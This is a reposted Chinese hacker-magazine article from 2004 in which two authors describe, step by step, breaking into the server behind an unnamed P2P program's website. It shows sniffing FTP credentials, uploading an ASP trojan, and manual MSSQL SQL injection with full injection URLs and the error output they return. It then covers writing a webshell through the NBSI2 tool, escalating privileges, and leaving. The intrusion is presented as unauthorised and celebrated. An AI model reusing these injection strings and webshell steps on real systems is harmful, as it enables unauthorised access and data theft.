收藏本站 收藏本站
积木网首页 - 软件测试 - 常用手册 - 站长工具 - 技术社区
积木学院 > 黑客技术 > 病毒漏洞 > 正文

从程序的漏洞到服务器的安全渗透

来源:互联摘选 日期:2007-03-22 18:35

作者:作者:Taynni[B.C.T] HaK_BaN[B.C.T] http://www.cnbct.org/

 已刊登于黑客X档案2004合订本

最近无聊没事干就在闲雅之中找事干,和Taynni重新检测某程序的安全,程序是P2P编写的网络平台,打开程序之后就会连接到指定的网站地址进行浏览,而且有网络硬盘和个人建站的功能,的确不错啊。     当初我们在三个月就发现了他们的个人建站存在着上传漏洞,可以直接威胁到主机的安全,三个月之后的安全如何了?!我们再次进行了渗透。(PS:因文章会影响到该程序以及服务器的安全,所以文章中是不会提及该程序的名称以及网站地址,请见凉)   程序漏洞检测:     这个程序的原理就是借助程序的设定指向用户到服务器上面的网站进行浏览以及其他服务的操作(好像卡盟之类的程序一样啊),我们首先看的是程序的自身问题,看了很久发现好像只有网络硬盘有可能出现问题啊!所以就试着上传程序指定以外的程序上去(网络硬盘指定只能够上传音乐文件),在选择上传的地方无法选择规定以外的文件,只能够自己键入文件名进行上传测试了!结果竟然是......
我晕啊,什么垃圾啊!?晕死啊,突然想起Hoky在Blog说关于如何发现QQ的网络硬盘的方法,然后我们又开始试试能不能找到这个程序的网络硬盘地址!可能有机会得到webshell啊!拿着WSE进行数据包的抓取,哈哈哈哈终于拿到一些有用的东西了!
我晕啊~~哈哈哈我们好像拿到了上传的用户名和帐号啊!哈哈哈哈,马上用Flashfxp进行登陆,嘻嘻上传ASP木马上去,那时候就得到webshell了啊!哈哈哈
登陆了登陆了我们登陆上去了!发现FTP是SERV-U的5.2没有远程溢出啊!唉,竟然如此只好上传webshel。哈哈哈,找到属于自己的文件夹上传了webshell上去,看看能不能访问啊!程序有提示上传后的文件如何进行访问,所以看着介绍很快的就找到了自己后门地址啊!但是结果又是.................(HaK_BaN:Taynni你是不是带衰我啊!?干吗我整天都不行的啊)
我更加晕啊~看来网管真的有想到如果被发现帐号的问题和处理了!竟然将网络硬盘的IIS设置为不可以运行可执行程序的权限。我晕啊!!为什么天要这样子对我们啊!!!!     网站漏洞检测:     晕死,既然不行就再找吧,程序指向的网站是ASP的结构啊!有BBS系统(WWF 7.8版本的)但是没有什么可能性啊!只好在网站上面逛了逛(Taynni:我找到漏洞了啊!) 原来找到的是网站的翻唱系统的SQL注入漏洞啊! 我们就拿着这个页面作为突破口! http://www.*****.com/home/Sing_info.asp?Rdnj_ID=106990 然后测试叶子,构造语句,提交Url http://www.*****.com/home/Sing_info.asp?Rdnj_ID=106990%20HAVING%201=1-- 然后返回信息了: Microsoft OLE DB Provider for SQL Server 错误 '80040e14'   在关键字 'HAVING' 附近有语法错误。   /home/Sing_info.asp,行21 晕倒,这个是用来搞他的字段的名字的,同时也可以查到表名,这里不行,不过已经可以肯定他是sql的数据库了(HaK_BaN:晕死,快傻了啊我) 我们不能就这样算了,得不到我们所需要的信息的时候只有重新构造,再构造:   http://www.*****.com/home/Sing_info.asp?Rdnj_ID=106990%20and%201=(select%20@@VERSION)-- 信息返回: Microsoft OLE DB Provider for SQL Server 错误 '80040e07'   将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。   /home/Sing_info.asp,行21   这里我们还是判断数据库的类型和版本,嘿嘿,从返回的信息中明显可以看到是mssql的数据库,再来,看看偶们要的数据库名字是什么?   这里说明一下,dbid在6以前是系统的,6(包括6)以后的才是我们所要的,所以要从6开始,我们测试的时候一定要注意。提交语句如下:   http://www.*****.com/home/Sing_info.asp?Rdnj_ID=106990%20and%201=(select%20name%20from%20master.dbo.sysdatabases%20where%20dbid=7) 返回: Microsoft OLE DB Provider for SQL Server 错误 '80040e07'   将 nvarchar 值 '******' 转换为数据类型为 int 的列时发生语法错误。 (这里隐藏了数据库名称)   /home/Sing_info.asp,行21 呵呵,得到我们所要的了,发现没有?Y的总是在转换,数据类型,我觉得这里也可以大胆的判断一下,数据库是不是不支持多句查询呢?或者子句查询,再来看看我们的权限是什么,首先看看是不是sa!?提交语句如下:   http://www.*****.com/home/Sing_info.asp?Rdnj_ID=106990%20and%20'sa'=(select%20System_user) 返回: Microsoft OLE DB Provider for SQL Server 错误 '80040e14' 第 1 行: 'sa' 附近有语法错误。   /Home/Include/Function_Singlist.asp,行171 偶晕,出现语法错误,其实这里也就可以看出来,过滤了‘,算了,不要提交带有'的语句就成了   测试一下用户看看  http://www.*****.com/home/Sing_info.asp?Rdnj_ID=106990%20and%200<>(select%20user_name(%20))-- 返回: Microsoft OLE DB Provider for SQL Server 错误 '80040e07'   将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。   /home/Sing_info.asp,行21 hoho,出现了dbo,什么意思?这里应该可以很肯定地说明我们的权限是sa的权限了,其实大家也可以用union查询的方法,union的方法在asp和php的注入上其实更能让你快速得到想要的东西   初步可以肯定了:数据库是mssql的,权限是sa的,过滤了一些字符,还有就是可能不支持多句查询        好了,我们可以利用工具看看,小竹的NBSI2,呵呵,其实啊,小竹是nb啊,小竹n啊,写个NBSI2改写了入侵的历史,偶是佩服得冒得言语打,但是技术是自己的(HaK_BaN:不要拍马屁了啊,快干活啊!)我们自己不能丢掉!!!!所以大家还是多用手工测试一下,工具做为辅助,看看NBSI2对_info.asp?Rdnj_ID=106990">http://www.*****.com/home/Sing_info.asp?Rdnj_ID=106990的测试是不是正确的!
哈哈哈哈~~~不错吧~~~真的是一样的结果啊!得到数据库和表之后发现我们的信息对于得到webshell没有多大的作用啊!正在苦思的时候忘记了NBSI2的功能NB Commander的作用啊!可以利用SQL的注入进行webshell的上传啊!哈哈哈哈!这样子我们就可以拿到我们需要的webshell了,从查看路径下发现了我们的web文件夹的物理路径,哈哈哈这次我们可以拿到webshell了吧?  
开心的将砍客的C/S后门进行上传,但是结果竟然是令我们吐血的....... (HaK_BaN:我要砍死你Taynni,带衰我啊)
超级奇怪!超级奇怪!测试了N个后门都不行啊!!唉!!!是不是字数限制啊?!当时想了想,还是用最小的后门吧!桂林老兵的shellclient只有一行代码而已啊!利用WSH功能的!试试能不能成功啊!上传之后利用老兵的client端已经生成新的shell。
依照地址找了N久都找不到啊!!!晕晕啊!难道我们又要投降啊!!将近要投降的地步下,将后门的地址设定为网址的根目录进行访问!哈哈哈哈,我们的shell.asp啊!!原来原来在这里啊!!!哈哈哈哈
    YYD~~~~我们终于进去服务器了啊!!!从程序直到入侵服务器!!用了N个方法,终于都是进去了啊!!哈哈哈哈!!弄到了webshell,提权完之后就拍拍屁股走掉了啊!至于官方好像还没有发现问题的所在啊!所以在网站目录留下了关于漏洞的问题就悄然的离开了!哈哈哈哈!     每次都要想想文章的结尾是什么?!晕死啊!还是那句话吧!希望大家支持我们!我们是漏洞小组!嘻嘻说真的希望大家知道的是要懂得如何去利用程序,也要懂得如何去找出程序的漏洞和问题所在,这样子才是真的懂得利用程序的人。

推荐阅读

 

热点信息

 
强悍的草根IT技术社区,这里应该有您想要的! 友情链接:b2b电子商务
Copyright © 2010 Gimoo.Net. All Rights Rreserved  京ICP备05050695号